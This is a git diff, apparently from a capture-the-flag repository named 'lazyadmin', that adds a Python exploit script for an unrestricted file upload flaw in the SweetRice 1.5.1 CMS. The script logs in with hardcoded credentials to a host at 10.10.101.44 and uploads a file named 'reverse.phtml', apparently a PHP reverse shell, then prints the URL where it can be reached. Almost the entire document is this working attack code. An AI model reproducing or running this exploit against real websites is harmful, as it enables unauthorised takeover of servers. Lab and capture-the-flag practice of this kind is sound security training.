diff options
Diffstat (limited to '')
| -rwxr-xr-x | lazyadmin/40716.py | 45 | 
1 files changed, 45 insertions, 0 deletions
| diff --git a/lazyadmin/40716.py b/lazyadmin/40716.py new file mode 100755 index 0000000..63c6f16 --- /dev/null +++ b/lazyadmin/40716.py @@ -0,0 +1,45 @@ +#/usr/bin/python +#-*- Coding: utf-8 -*- +# Exploit Title: SweetRice 1.5.1 - Unrestricted File Upload +# Exploit Author: Ashiyane Digital Security Team +# Date: 03-11-2016 +# Vendor: http://www.basic-cms.org/ +# Software Link: http://www.basic-cms.org/attachment/sweetrice-1.5.1.zip +# Version: 1.5.1 +# Platform: WebApp - PHP - Mysql + +from requests import session + +# Get Host & User & Pass & filename +host = '10.10.101.44/content' +username = 'manager' +password = 'Password123' +filename = 'reverse.phtml' +file = {'upload[]': open(filename, 'rb')} + +payload = { +    'user':username, +    'passwd':password, +    'rememberMe':'' +} + + + +with session() as r: +    login = r.post('http://' + host + '/as/?type=signin', data=payload) +    success = 'Login success' +    if login.status_code == 200: +        print("[+] Sending User&Pass...") +        if login.text.find(success) > 1: +            print("[+] Login Succssfully...") +        else: +            print("[-] User or Pass is incorrent...") +            print("Good Bye...") +            exit() +            pass +        pass +    uploadfile = r.post('http://' + host + '/as/?type=media_center&mode=upload', files=file) +    if uploadfile.status_code == 200: +        print("[+] File Uploaded...") +        print("[+] URL : http://" + host + "/attachment/" + filename) +        pass | 
